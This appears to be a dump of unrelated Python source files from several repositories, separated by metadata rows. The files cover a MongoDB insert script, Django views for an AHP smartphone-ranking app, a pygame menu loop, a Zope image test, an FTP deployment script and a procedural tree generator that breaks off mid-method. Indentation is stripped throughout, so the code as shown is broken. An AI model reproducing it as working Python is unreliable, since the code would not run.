| 2016-09-05T21:33:50.740459 | 2013-11-12T03:27:37 | 2013-11-12T03:27:37 | 14,321,162 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# MongoDB wins! (>> SQL-Alchemy, > SQLite3)
# ... because: it can save whole dictionaries to db
import pymongo
import datetime
#from app import db
#class Meal_Type(db.Document):
# lunch = db.StringField(max_length=255)
# dinner = db.StringField(max_length=255)
# misc = db.StringField(max_length=255)
# today_date = db.DateTimeField(default=datetime.datetime.now)
def setup_db():
# establish a connection
con = pymongo.Connection()
# this is the database in MongoDB
db = con.fooddata
# debugging: print db
# this is table -- or, collection in Mondo DB -- I care about within the aforementioned database
food_entries = db.food_entries
return food_entries
def insertData_to_db(collection, dictToInsert):
#globalMealTest = {
# "lunch": [54],
# "dinner": [],
# "misc": [6]
# }
#food_entries.insert(globalMealTest)
# 1.) INSERT
collection.insert(dictToInsert)
# 2.) FIND
meals = collection.find()
#meals = collection.find_one()
print ""
print "###################"
print "INSERT & FIND TEST"
print "###################"
print "%d instances in food_entries collection" % collection.count()
for meal in meals:
print meal
print ""
|
UTF-8
|
Python
| false | false | 2,013 |
17,420,387,361,412 |
98b6e57334c5d50bf7360c7340c8cd2ac598983e
|
7df1d3ea5231a811ca25e9c5b9729e52352f3fea
|
/preprocessing/add_freebase_id.py
|
5df166a379a0d787cffc99061104514f7070ce99
|
[
"MIT"
] |
permissive
|
postfix/ensu
|
https://github.com/postfix/ensu
|
a82cc807b1f4d13df0297f6b546a7b58ffe5494f
|
8d189064e0ce90f374b6527a18182c4284512eef
|
refs/heads/master
| 2017-05-02T21:30:32.198876 | 2014-10-13T20:30:02 | 2014-10-13T20:30:02 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
import sys
import csv
import copy
reload(sys)
sys.setdefaultencoding('utf-8')
csv.field_size_limit(sys.maxsize)
def main():
ids = {}
with open('map_id_freebase_id.csv', 'rb') as f:
for row in csv.reader(f):
ids[row[0]] = row[1]
writer = csv.writer(sys.stdout)
for row in csv.reader(sys.stdin):
if ids.get(row[1]):
new_row = copy.copy(row)
new_row.insert(2, ids[row[1]])
writer.writerow(new_row)
if __name__ == "__main__":
main()
|
UTF-8
|
Python
| false | false | 2,014 |
14,499,809,629,948 |
0781831805dfd58bbb23183db34dde23731e3f51
|
ef7dbcf5ce0304d5536eb580d58f6cc344dab165
|
/ahp/core/views.py
|
e36a93c1c75f51de9550b6146c239d8e0cdb5b79
|
[] |
no_license
|
kleko09/django-ahp
|
https://github.com/kleko09/django-ahp
|
d4e725992afc88dc95c6d11dac40b75ee1837059
|
77c56a0dd9275bb66b2c22f0c2db9ea0312021fe
|
refs/heads/master
| 2016-08-05T14:04:59.204703 | 2013-06-08T17:46:25 | 2013-06-08T17:46:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding=UTF-8
from ahp.algorithm import ahp_algorithm
from ahp.core import utils
from ahp.core.forms import CompareForm, SelectSmartphonesForm
from ahp.core.models import CriterionRating, Smartphone, Criterion, Rating
from braces.views import LoginRequiredMixin
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.http.response import Http404
from django.shortcuts import redirect
from django.views.generic.base import TemplateView
from django.views.generic.edit import FormView
from django.views.generic.list import ListView
from django.db.models import Q
class HomeView(TemplateView):
template_name = "core/home.html"
class ExampleView(TemplateView):
template_name = "core/example.html"
def get_context_data(self, **kwargs):
ctx = super(TemplateView, self).get_context_data(**kwargs)
comparison_matrix = [[1, 3, 7, 9],
[1. / 3, 1, 3, 7],
[1. / 7, 1. / 3, 1, 3],
[1. / 9, 1. / 7, 1. / 3, 1]]
cena_matrix = [[1, 9, 7, 5],
[1. / 9, 1, 7, 5],
[1. / 7, 1. / 7, 1, 3],
[1. / 5, 1. / 5, 1. / 3, 1]]
parametry_matrix = [[1, 1, 1. / 7, 2],
[1, 1, 1. / 7, 2],
[7, 7, 1, 9],
[1. / 2, 1. / 2, 1. / 9, 1]]
wykonanie_matrix = [[1, 1. / 2, 3, 7],
[2, 1, 3, 5],
[1. / 3, 1. / 3, 1, 3],
[1. / 7, 1. / 5, 1. / 3, 1]]
wyswietlacz_matrix = [[1, 3, 7, 3],
[1. / 3, 1, 3, 5],
[1. / 7, 1. / 3, 1, 1. / 3],
[1. / 3, 1. / 5, 3, 1]]
matrices = [comparison_matrix, cena_matrix, parametry_matrix, wykonanie_matrix, wyswietlacz_matrix]
normalized = ahp_algorithm._normalize_table(matrices)
s_vectors = ahp_algorithm._s_vectors(normalized)
ranking = ahp_algorithm._create_ranking(s_vectors)
criteria = ['cena', 'parametry', 'wykonanie', 'wyświetlacz']
objects = ['BlackBerry Z10', 'IPhone 5', 'Samsung Galaxy S4', 'Sony Xperia Z']
ctx.update({'criteria': criteria,
'objects': objects,
'matrices':matrices,
'normalized_matrices': normalized,
's_vectors': s_vectors,
'ranking' : ranking
})
return ctx
def print_matrix(self, matrix):
print "\n".join(["\t".join(map(str, r)) for r in matrix])
class SmartphonesListView(ListView):
template_name = "core/smartphones_list.html"
model = Smartphone
paginate_by = 30
class RateView(LoginRequiredMixin, TemplateView):
template_name = "core/rate.html"
def get(self, request, *args, **kwargs):
return super(RateView, self).get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
ctx = super(RateView, self).get_context_data(**kwargs)
try:
first = Smartphone.objects.get(pk=kwargs.get('first'))
second = Smartphone.objects.get(pk=kwargs.get('second'))
if first == second:
pass
# TODO:
ctx.update({"first": first,
'second': second})
except Exception:
raise Http404
items = self.request.GET.items()
for i in items:
if i[0][:3] == 'cr_':
try:
rating_value = int(i[1])
criterion = Criterion.objects.get(pk=int(i[0][3:]))
if Rating.objects.is_rated(self.request.user, first, second, criterion):
rating_object = Rating.objects.get(
Q(user=self.request.user,
first_smartphone=first,
second_smartphone=second,
criterion=criterion) |
Q(user=self.request.user,
first_smartphone=second,
second_smartphone=first,
criterion=criterion)
)
if rating_value == 0:
rating_object.delete()
else:
if rating_object.first_smartphone == first and rating_object.second_smartphone == second:
rating_object.rating = rating_value
elif rating_object.first_smartphone == second and rating_object.second_smartphone == first:
rating_object.rating = -rating_value
rating_object.save()
else:
if rating_value != 0:
rate = Rating(user=self.request.user,
first_smartphone=first,
second_smartphone=second,
criterion=criterion,
rating=rating_value)
rate.save()
except Exception, e:
raise Http404
ratings = list(Rating.objects.filter(user=self.request.user
).filter(Q(first_smartphone=first,
second_smartphone=second) |
Q(first_smartphone=second,
second_smartphone=first)))
criteria = Criterion.objects.all()
for c in criteria:
r = next((r for r in ratings if r.criterion == c), None)
if r:
if r.first_smartphone == first and r.second_smartphone == second:
c.r = r.rating
elif r.first_smartphone == second and r.second_smartphone == first:
c.r = -r.rating
ctx.update({"criteria": criteria
})
return ctx
class RateChooseSmartphonesView(LoginRequiredMixin, FormView):
form_class = SelectSmartphonesForm
template_name = 'core/rate_choose_smartphones.html'
def get_context_data(self, **kwargs):
ctx = super(RateChooseSmartphonesView, self).get_context_data(**kwargs)
# lista ostatnio ocenionych
recently_rated = Rating.objects.filter(user=self.request.user).distinct('first_smartphone', 'second_smartphone')
ctx.update({'recently_rated': recently_rated
})
return ctx
def get_success_url(self):
first = self.request.POST.get('first')
second = self.request.POST.get('second')
url = reverse('rate', args=[int(first), int(second)])
return url
class CompareView(LoginRequiredMixin, FormView):
form_class = CompareForm
template_name = 'core/compare.html'
def form_valid(self, form):
smartphones = list(form.cleaned_data['smartphones'])
smartphones.reverse()
criteria = Criterion.objects.all()
matrices = []
matrices.append(utils.get_comparison_matrix(self.request.user))
for c in criteria:
m = utils.get_matrix_for_smartphones(smartphones, c)
matrices.append(m)
r, s, norm = ahp_algorithm.ahp(matrices)
result = smartphones[r.index(max(r))]
other_smartphones = [ (idx+2, smartphones[r.index(x)]) for idx, x in enumerate(sorted(r, reverse=True)[1:])]
print other_smartphones
ctx = {'result': result,
'other_smartphones': other_smartphones}
return self.response_class(
request=self.request,
template='core/result.html',
context=ctx
)
def post(self, request, *args, **kwargs):
self.comparison_matrix = [[1 for i in range(5)] for j in range(5)]
import itertools
comb = itertools.combinations(Criterion.objects.all(), 2)
for ids in comb:
rating = int(request.POST.get('%s_%s' % (ids[0].pk, ids[1].pk)))
try:
criterion_r = CriterionRating.objects.get(user=self.request.user,
first=ids[0],
second=ids[1])
criterion_r.rating = rating
criterion_r.save()
except ObjectDoesNotExist:
criterion_r = CriterionRating(user=self.request.user,
first=ids[0],
second=ids[1],
rating=rating)
criterion_r.save()
return FormView.post(self, request, *args, **kwargs)
def get_context_data(self, **kwargs):
ctx = super(CompareView, self).get_context_data(**kwargs)
# criteria_rates = [0, 0, 0, 0, 0, 0]
criteria = Criterion.objects.all()
criteria_rates = [
{'c1':criteria[0], 'c2':criteria[1], 'r':None},
{'c1':criteria[0], 'c2':criteria[2], 'r':None},
{'c1':criteria[0], 'c2':criteria[3], 'r':None},
{'c1':criteria[1], 'c2':criteria[2], 'r':None},
{'c1':criteria[1], 'c2':criteria[3], 'r':None},
{'c1':criteria[2], 'c2':criteria[3], 'r':None}
]
# update rating
for c in criteria_rates:
try:
c['r'] = CriterionRating.objects.get(user=self.request.user, first=c['c1'], second=c['c2']).rating
except ObjectDoesNotExist:
c['r'] = None
ctx.update({'criteria_rates': criteria_rates
})
return ctx
def dispatch(self, request, *args, **kwargs):
return LoginRequiredMixin.dispatch(self, request, *args, **kwargs)
|
UTF-8
|
Python
| false | false | 2,013 |
5,927,054,913,659 |
0e7255c51cb122abe260a961eb4f44b7ed88beed
|
41b871fbe0d4d11d5692251725c486e2629fdd2a
|
/src/haf/system/__init__.py
|
cf5de9be2ebaacddaae55f94f3230fb126b547e7
|
[] |
no_license
|
chuck211991/power
|
https://github.com/chuck211991/power
|
5565dc788c90c4d987cca3adab5b9c1ee71af7eb
|
0394993eabd535d2c7f7285bed8b14974d08c00c
|
refs/heads/master
| 2021-01-19T19:30:57.022310 | 2013-04-23T16:56:52 | 2013-04-23T16:56:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from system.resources import UserResource
from rest_api.apis import raw
raw.api.register(UserResource())
|
UTF-8
|
Python
| false | false | 2,013 |
5,239,860,113,574 |
f2b1adba9b51a03163e3462422a12d9404772b74
|
2f3d80f5560f29fd1d8e819d7ec9ba3755bd9aa5
|
/evaluation/analysis/generate_current_chart.py
|
510f5d3a2c4dab6ce8523fd6807429c609742207
|
[] |
no_license
|
gomezgoiri/Nist
|
https://github.com/gomezgoiri/Nist
|
3cb65f2bc84035e582c2befc35f06fb8147431b1
|
cdc64623be16d595a20ce7b9f6bc35d0a40d4a3b
|
refs/heads/master
| 2021-01-18T19:45:02.627058 | 2014-07-10T10:40:55 | 2014-07-10T10:40:55 | 21,585,659 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
'''
Copyright (C) 2014 onwards University of Deusto
All rights reserved.
This software is licensed as described in the file COPYING, which
you should have received as part of this distribution.
This software consists of contributions made by many individuals,
listed below:
@author: Aitor Gómez Goiri <[email protected]>
'''
from argparse import ArgumentParser
from parser import parse_mWatt_data
import numpy as np
from itertools import cycle
import matplotlib.pyplot as plt
from chart_utils import ChartImprover
class DiagramGenerator:
def __init__(self, title, data):
# http://colorschemedesigner.com/previous/colorscheme2/index-es.html?tetrad;100;0;225;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0.3;-0.8;0.3;0.5;0.1;0.9;0.5;0.75;0
self.linesColors = ("#E6AC73", "#CFE673", "#507EA1", "#E67373", "#8A458A")
# self.linesShapes = ('xk-','+k-.','Dk--') # avoiding spaghetti lines
self.ci = ChartImprover( title = None, # title,
xlabel = 'Time (ms)',
ylabel = {"label": 'Current (A)', "x": -0.02, "y": 1.1}, # Power (W)
legend_from_to = (0.04, 1.0),
line_width = 0.3 )
self.generate(data)
def generate(self, data):
fig = plt.figure( figsize=(30, 6) )
ax = fig.add_subplot(111)
colors = cycle(self.linesColors)
ax.plot(data[0], data[1], 'k-',
color = colors.next())
handles, labels = ax.get_legend_handles_labels()
#ax.legend(handles, labels, loc='best')
#ax.set_xlim(0)
#ax.set_ylim(0)
self.ci.improve_following_guidelines(ax)
def show(self):
plt.show()
def save(self, filename):
plt.savefig(filename, bbox_inches='tight')
if __name__ == '__main__':
argp = ArgumentParser()
argp.add_argument('-rs','--results', default="../results", dest='results_path',
help='Specify the folder containing the result files to parse.')
args = argp.parse_args()
parsed_data = parse_mWatt_data( args.results_path + "/energy/ExportedData_current.csv", from_t=3.1, to_t=30 ) # ExportedData_current, allKeysSize_current
d = DiagramGenerator("Current needed", parsed_data)
d.save('/tmp/current_kdfs.pdf') # or .svg
|
UTF-8
|
Python
| false | false | 2,014 |
15,427,522,545,376 |
da8b6c7754117d8a0786fc1af744654908904a29
|
afdb1272a5e3e3b585401c8c91d11bc8c92981ec
|
/node_modules/espresso/deploy/ftp/deploy.py
|
aa3fcaebd5c8b5d9673341f5503469008c40c5cc
|
[
"GPL-2.0-only",
"JSON",
"BSD-3-Clause",
"MIT",
"GPL-1.0-or-later",
"Apache-2.0"
] |
non_permissive
|
rustedgrail/Tacticalle
|
https://github.com/rustedgrail/Tacticalle
|
cb3b4180c9a6b5af69ab0f3681b86d2e8efcf096
|
b603d837702b76ecb8b0e2dad144f0ecfb0f8ace
|
refs/heads/master
| 2020-05-18T12:14:54.354680 | 2014-03-25T20:20:16 | 2014-03-25T20:20:16 | 13,529,626 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#! /usr/bin/env python2
"""Espresso FTP deployment module.
Copyright(c) 2011 Panacoda GmbH. All rights reserved.
This file is licensed under the MIT license.
Example usage:
#! /bin/sh
host=ftp.panacoda.com # required
port=10021 # optional; default is 21
username=foo # required
password=bar # required
targetPath=/foo # required
deleteTargetPath=true # optional; default is false
timeout=10000 # optional; default is 15000
export host port username password targetPath timeout deleteTargetPath
# deploy $PWD/bar as ftp://foo@bar:ftp.panacoda.com:10021/foo
exec python2 deploy.py bar
"""
import ftplib, sys, re, os
from os.path import basename, dirname, isdir, join, normpath
debugLevel = 0
workingDirectory = False
def cwd(ftp, path):
"""change remote working directory if it has changed"""
global workingDirectory
if (workingDirectory != path):
step(ftp.cwd(path))
workingDirectory = ftp.pwd()
def delete(ftp, path):
"""delete a remote file or directory (recursive)"""
global workingDirectory
path = normpath(path)
# if path isn't a basename then cwd and make path a basename first
if basename(path) != path:
cwd(ftp, dirname(path))
path = basename(path)
targetPath = join(workingDirectory, path);
try:
cwd(ftp, dirname(targetPath))
step(ftp.delete(basename(targetPath)))
except ftplib.error_perm:
# targetPath was no deletable file. maybe it's a directory...
try:
cwd(ftp, targetPath)
for i in ftp.nlst():
if not re.match('^\.\.?$', i):
delete(ftp, i)
cwd(ftp, '..')
step(ftp.rmd(targetPath))
except ftplib.error_perm:
# let's presume the target directory or file didn't exist...
# that's just what we wanted -> yay, nothing to do! ^_^
pass
def exists(ftp, path):
"""check if a remote file or directory exists"""
path = normpath(path)
try:
ftp.sendcmd('MLst ' + path)
result = True
except ftplib.error_perm:
result = False
return result
def put(ftp, sourcePath, targetPath):
"""upload a file or directory (recursive)"""
sourcePath = normpath(sourcePath)
targetPath = normpath(targetPath)
# try to upload a file... or a directory
if (isdir(sourcePath)):
cwd(ftp, dirname(targetPath))
step(ftp.mkd(basename(targetPath)))
for i in os.listdir(sourcePath):
put(ftp, join(sourcePath, i), join(targetPath, i))
else:
cwd(ftp, dirname(targetPath))
step(ftp.storbinary('STOR ' + basename(targetPath), open(sourcePath, 'rb')))
def step(x):
"""indicate progress"""
global debugLevel
if (debugLevel == 0):
sys.stderr.write('.')
if __name__ == '__main__':
try:
source_directory_names = sys.argv[1:]
# load mandatory configuration
try:
config = os.environ
host = config['host']
username = config['username']
password = config['password']
except KeyError as key:
# TODO better error message
raise Exception('require configuration: ' + str(key))
# load optional configuration... or use default values
port = int(config['port'] if 'port' in config else 21)
timeout = int(config['timeout'] if 'timeout' in config else 15000)
targetPath = config['targetPath'] if 'targetPath' in config else '/'
if 'debugLevel' in config:
debugLevel = int(config['debugLevel'])
# TODO? print configuration
ftp = ftplib.FTP()
ftp.set_debuglevel(debugLevel)
step(ftp.connect(host, port, timeout))
step(ftp.login(username, password))
if exists(ftp, targetPath):
if 'deleteTargetPath' in config and config['deleteTargetPath'] == 'true':
delete(ftp, targetPath)
else:
raise Exception('targetPath already exists, use deleteTargetPath to remove it first');
for sourcePath in source_directory_names:
put(ftp, sourcePath, targetPath)
step(ftp.quit())
if (debugLevel == 0):
sys.stderr.write('ok\n')
sys.exit(0)
except Exception as x:
sys.stderr.write('\nError: ' + str(x) + '\n')
sys.exit(23)
|
UTF-8
|
Python
| false | false | 2,014 |
4,956,392,294,830 |
d7344d6a986e7d879d8e7de322aee5f614f653b7
|
411227479079ccf1d9a4d0417f6d7d1361268f2a
|
/game.py
|
7b0830ec17269da7f454500551058eb9d27c02dd
|
[] |
no_license
|
gshopov/Pyruto
|
https://github.com/gshopov/Pyruto
|
197482607e2be18c91b9430b24a723cb6f74cb2b
|
12ca861b821cbabd6861c19840779952e759c1c1
|
refs/heads/master
| 2016-09-05T17:11:48.378397 | 2013-07-06T05:52:17 | 2013-07-06T05:52:17 | 11,158,568 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# try:
import os
import pygame
from settings import (MAIN_MENU, OPTIONS_MENU, CHARACTER_MENU, PLAY_MENU,
EXIT, SCREEN_SIZE)
from main_menu import MainMenu
from character_menu import CharacterMenu
from options_menu import OptionsMenu
from play_menu import PlayMenu
# except ImportError as message:
# raise SystemExit(message)
os.environ['SDL_VIDEO_CENTERED'] = '1'
class Game:
"""Class that consists of main, character, options and play menu and
implements the communication between them.
"""
def __init__(self):
"""Initialize a pygame.display and a MainMenu member variables."""
pygame.init()
self.screen = pygame.display.set_mode(SCREEN_SIZE)
self.status = MAIN_MENU
def run_main_menu(self):
"""Call the main method of main_menu.
If the instance has no 'main_menu' attribute or it is not properly
initialized a new one is instantiated.
Game.loop_main_menu(): return:
EXIT if the user(s) quitted the game
CHARACTER_MENU if the user(s) pressed the Play button
OPTIONS_MENU if the user(s) pressed the Options button
"""
if not hasattr(self, "main_menu"):
self.main_menu = MainMenu()
else:
self.main_menu.reinit()
return self.main_menu.main(self.screen)
def run_character_menu(self):
"""Call the main method of character_menu.
If the instance has no 'character_menu' attribute or it is not properly
initialized a new one is instantiated.
Game.loop_character_menu(): return:
EXIT if the user(s) quitted the game
MAIN_MENU if the user(s) when back to the main menu
PLAY_MENU if the user(s) properly selected their
characters and advanced to play the game
"""
if not hasattr(self, "character_menu"):
self.character_menu = CharacterMenu()
else:
self.character_menu.reinit()
return self.character_menu.main(self.screen)
def run_options_menu(self):
"""Call the main method of options_menu.
If the instance has no 'options_menu' attribute or it is not properly
initialized a new one is instantiated.
Game.loop_options_menu(): return:
EXIT if the user(s) quitted the game
MAIN_MENU if the user(s) when back to the main menu
"""
if not hasattr(self, "options_menu"):
self.options_menu = OptionsMenu()
return self.options_menu.main(self.screen)
def run_play_menu(self):
"""Call the main method of play_menu.
If the instance has 'play_menu' it is deleted and a new one is
instantiated.
Game.loop_play_menu(): return:
EXIT if the display has been closed
CHARACTER_MENU if the round has ended (a player died or the timer
reached ROUND_TIME)
"""
if hasattr(self, "play_menu"):
del self.play_menu
self.play_menu = PlayMenu(self.character_menu.get_characters())
return self.play_menu.main(self.screen)
def play(self):
"""Make the menus communicated with each other until an EXIT value
is returned by the main method of a menu. The returned values are
held in the status attribute.
Game.play(): return None
"""
while self.status != EXIT:
if self.status == MAIN_MENU:
self.status = self.run_main_menu()
elif self.status == CHARACTER_MENU:
self.status = self.run_character_menu()
elif self.status == OPTIONS_MENU:
self.status = self.run_options_menu()
elif self.status == PLAY_MENU:
self.status = self.run_play_menu()
pygame.quit()
|
UTF-8
|
Python
| false | false | 2,013 |
16,844,861,769,235 |
41a0b5ec1f9c48de48c986ade15a00e3e3cd8677
|
fe6740673af5f093f41d9cfab5c12883aa6ebbb2
|
/plata/product/feincms/admin.py
|
c6c4b831cc78c9c161f931ea30e3e113aeee8ef6
|
[
"BSD-2-Clause"
] |
permissive
|
chrisglass/plata
|
https://github.com/chrisglass/plata
|
7cb0a2697faff7e0482909aedc2c1b4d3fe8fb0d
|
fce185e5a1c528b0e059a875eaa5724292827bc7
|
refs/heads/master
| 2021-01-17T09:41:05.019482 | 2011-01-20T17:11:41 | 2011-01-20T17:11:41 | 1,320,066 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.contrib import admin
from django.utils.translation import ugettext_lazy as _
from feincms.admin.item_editor import ItemEditor, FEINCMS_CONTENT_FIELDSET
from plata.product.admin import ProductAdmin, ProductVariationInline,\
ProductPriceInline, ProductImageInline, ProductForm
from plata.product.models import Product
from . import models
class CMSProductForm(ProductForm):
class Meta:
model = models.CMSProduct
class ProductAdmin(ProductAdmin, ItemEditor):
fieldsets = [(None, {
'fields': ('is_active', 'name', 'slug', 'sku', 'is_featured'),
}),
FEINCMS_CONTENT_FIELDSET,
(_('Properties'), {
'fields': ('ordering', 'description', 'producer', 'categories',
'option_groups', 'create_variations'),
}),
]
form = CMSProductForm
inlines = [ProductVariationInline, ProductPriceInline, ProductImageInline]
admin.site.unregister(Product)
admin.site.register(models.CMSProduct, ProductAdmin)
|
UTF-8
|
Python
| false | false | 2,011 |
10,230,612,104,351 |
16855429e6592cb6c5969ab0bbd70eed03954871
|
130b8d4782ccc600cf47728a511d7c25e6af060e
|
/butter/widgets/__init__.py
|
63dc9aeac29881d722060d3720b6e4bc691a383a
|
[] |
no_license
|
chrisdickinson/django-butter
|
https://github.com/chrisdickinson/django-butter
|
36dfe99612fd13950d6a3058c3a205b07d310218
|
e5e1644a35edd86441fd16e59eabbb9679739463
|
refs/heads/master
| 2023-05-31T08:22:49.414290 | 2011-05-24T08:03:20 | 2011-05-24T08:03:20 | 1,792,332 | 11 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from butter.widgets.related_form import RelatedFormWidget
|
UTF-8
|
Python
| false | false | 2,011 |
6,047,313,974,487 |
d6f299f8a1bbc30d33e81f97ed4b7e6b729316c0
|
153ecce57c94724d2fb16712c216fb15adef0bc4
|
/Zope3/tags/ZopeX3-3.0.0b1/src/zope/app/file/ftests/test_image.py
|
fba4a5a37833aa0c427d42d3f45389e9e34cdc5b
|
[
"ZPL-2.1",
"ZPL-2.0",
"ICU",
"LicenseRef-scancode-public-domain"
] |
non_permissive
|
pombredanne/zope
|
https://github.com/pombredanne/zope
|
10572830ba01cbfbad08b4e31451acc9c0653b39
|
c53f5dc4321d5a392ede428ed8d4ecf090aab8d2
|
refs/heads/master
| 2018-03-12T10:53:50.618672 | 2012-11-20T21:47:22 | 2012-11-20T21:47:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""File Functional Tests
$Id$
"""
import unittest
import cgi
from cStringIO import StringIO
from transaction import get_transaction
from zope.app.tests.functional import BrowserTestCase
from zope.publisher.browser import FileUpload
from zope.app.file.image import Image
zptlogo = (
'GIF89a\x10\x00\x10\x00\xd5\x00\x00\xff\xff\xff\xff\xff\xfe\xfc\xfd\xfd'
'\xfa\xfb\xfc\xf7\xf9\xfa\xf5\xf8\xf9\xf3\xf6\xf8\xf2\xf5\xf7\xf0\xf4\xf6'
'\xeb\xf1\xf3\xe5\xed\xef\xde\xe8\xeb\xdc\xe6\xea\xd9\xe4\xe8\xd7\xe2\xe6'
'\xd2\xdf\xe3\xd0\xdd\xe3\xcd\xdc\xe1\xcb\xda\xdf\xc9\xd9\xdf\xc8\xd8\xdd'
'\xc6\xd7\xdc\xc4\xd6\xdc\xc3\xd4\xda\xc2\xd3\xd9\xc1\xd3\xd9\xc0\xd2\xd9'
'\xbd\xd1\xd8\xbd\xd0\xd7\xbc\xcf\xd7\xbb\xcf\xd6\xbb\xce\xd5\xb9\xcd\xd4'
'\xb6\xcc\xd4\xb6\xcb\xd3\xb5\xcb\xd2\xb4\xca\xd1\xb2\xc8\xd0\xb1\xc7\xd0'
'\xb0\xc7\xcf\xaf\xc6\xce\xae\xc4\xce\xad\xc4\xcd\xab\xc3\xcc\xa9\xc2\xcb'
'\xa8\xc1\xca\xa6\xc0\xc9\xa4\xbe\xc8\xa2\xbd\xc7\xa0\xbb\xc5\x9e\xba\xc4'
'\x9b\xbf\xcc\x98\xb6\xc1\x8d\xae\xbaFgs\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00,\x00\x00\x00\x00\x10\x00\x10\x00\x00\x06z@\x80pH,\x12k\xc8$\xd2f\x04'
'\xd4\x84\x01\x01\xe1\xf0d\x16\x9f\x80A\x01\x91\xc0ZmL\xb0\xcd\x00V\xd4'
'\xc4a\x87z\xed\xb0-\x1a\xb3\xb8\x95\xbdf8\x1e\x11\xca,MoC$\x15\x18{'
'\x006}m\x13\x16\x1a\x1f\x83\x85}6\x17\x1b $\x83\x00\x86\x19\x1d!%)\x8c'
'\x866#\'+.\x8ca`\x1c`(,/1\x94B5\x19\x1e"&*-024\xacNq\xba\xbb\xb8h\xbeb'
'\x00A\x00;'
)
class TestFile(BrowserTestCase):
def _setupImage(self):
response = self.publish('/+/action.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.Image',
'id': u'img'})
fs = cgi.FieldStorage()
fs.name = 'field.data'
fs.value = 'test.gif'
fs.filename = 'test.gif'
fs.file = StringIO(zptlogo)
response = self.publish('/img/@@upload.html',
basic='mgr:mgrpw',
form={'field.data': FileUpload(fs),
'field.contentType': u'image/gif',
'UPDATE_SUBMIT': 'Change'})
def testAddImage(self):
# Step 1: add the image
response = self.publish('/+/action.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.Image',
'id': u'img'})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
# Step 2: check that it it visible in the folder listing
response = self.publish('/')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find('img') != -1)
# Step 3: check that its contents are available
response = self.publish('/img')
self.assertEqual(response.getStatus(), 200)
def testImageUpload(self):
self._setupImage()
root = self.getRootFolder()
self.assertEqual(root['img'].contentType, u'image/gif')
self.assertEqual(root['img'].data, zptlogo)
def testImageUploadOnlyChangingContentType(self):
self._setupImage()
response = self.publish('/img/@@upload.html',
basic='mgr:mgrpw',
form={'field.contentType': u'image/gif2',
'UPDATE_SUBMIT': u'Change'})
root = self.getRootFolder()
self.assertEqual(root['img'].contentType, u'image/gif2')
self.assertEqual(root['img'].data, zptlogo)
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestFile))
return suite
if __name__=='__main__':
unittest.main(defaultTest='test_suite')
|
UTF-8
|
Python
| false | false | 2,012 |
9,500,467,693,368 |
cb51dc5cd91dfed2d9a8186d72137ffddbec6cea
|
2646dd6b9a65eb77bd298501d29c8cbb62e42748
|
/vtrees23.py
|
a5def7a6bfc1d698b9068b23ee99b2341fbff603
|
[
"MIT"
] |
permissive
|
asockman/treemechanics
|
https://github.com/asockman/treemechanics
|
7532aeea4a366a15b3bc8b65f06aa69527aae7d9
|
47346ac2842ef91e4a8d0e6c681d1eafdc8cd5da
|
refs/heads/master
| 2021-01-02T22:50:50.511030 | 2014-07-10T02:12:55 | 2014-07-10T02:12:55 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
""" trees v0.2
procedurally generated foliage
(implicitly happy)
agrippa kellum : june 2013
"""
__all__ = ['Branch', 'Trunk']
import sys, random, math, time, visual as v, numpy as np
class Branch(object):
def __init__(self,inc,az,parent,origin):
self.parent = parent
self.size = 1
self.children = []
self.growtick = 0
self.order = parent.order + 1
self.splitchance = parent.splitchance
self.thickness = 1/100
self.thicken = 0.1/100
self.incmod = inc
self.inclination = parent.inclination+self.incmod
self.azmod = az
self.azimuth = parent.azimuth+self.azmod
self.origin = np.array(origin)
self.relativeorigin = (np.sum((self.origin-parent.origin)**2))**0.5
self.end = np.array(origin)
self.terminated = 0
self.age = 0
def delete(self):
while self.children:
self.children[0].delete()
self.parent.children.remove(self)
del self
def get_end(self,size):
x2 = self.origin[0] + (math.cos(self.azimuth) * math.sin(self.inclination) * size)
y2 = self.origin[1] + (math.cos(self.inclination) * size)
z2 = self.origin[2] + (math.sin(self.azimuth) * math.sin(self.inclination) * size)
return np.array([x2,y2,z2])
# @classmethod
def branchoff(self):
azmod = (random.random()*azrange*2)-azrange
incmod = (random.random()*incrange*2)-incrange
while abs(self.inclination+incmod) > maxinc:
incmod = (random.random()*incrange*2)-incrange
self.children.append(self.__class__(incmod, azmod, self, self.end))
def grow(self):
self.growtick += dominance**self.order
if self.growtick >= 1: #if i have received enough nutrients to grow...
self.growtick %= 1
self.age += 1 #TEMPORARY
